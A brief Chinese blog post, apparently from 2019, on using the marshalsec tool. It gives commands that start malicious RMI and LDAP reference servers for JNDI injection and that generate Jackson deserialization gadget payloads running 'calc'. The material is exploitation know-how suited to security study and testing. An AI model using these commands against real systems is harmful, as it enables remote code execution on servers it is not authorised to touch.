Fork me on GitHub

# marshalsec使用

开启rmi服务,恶意类放到服务上

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

开启ldap服务

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

参考链接
列出所有jackson的gadgets传参为calc

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a exploit.exec="calc"

Alt text
所有支持的组件
Alt text
所有支持的gadgets
Alt text
Alt text
如果想查找组件可以生成的gadgets有哪些
以Jackson为例

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson

Alt text
如果想查找gadgets可以用于哪些组件生成
1、以resin为例,可以查看手册
Alt text
2、选择想看的gadgets->find usages
Alt text
参考链接

posted @ 2019-07-29 19:53  Afant1  阅读(7515)  评论(0编辑  收藏  举报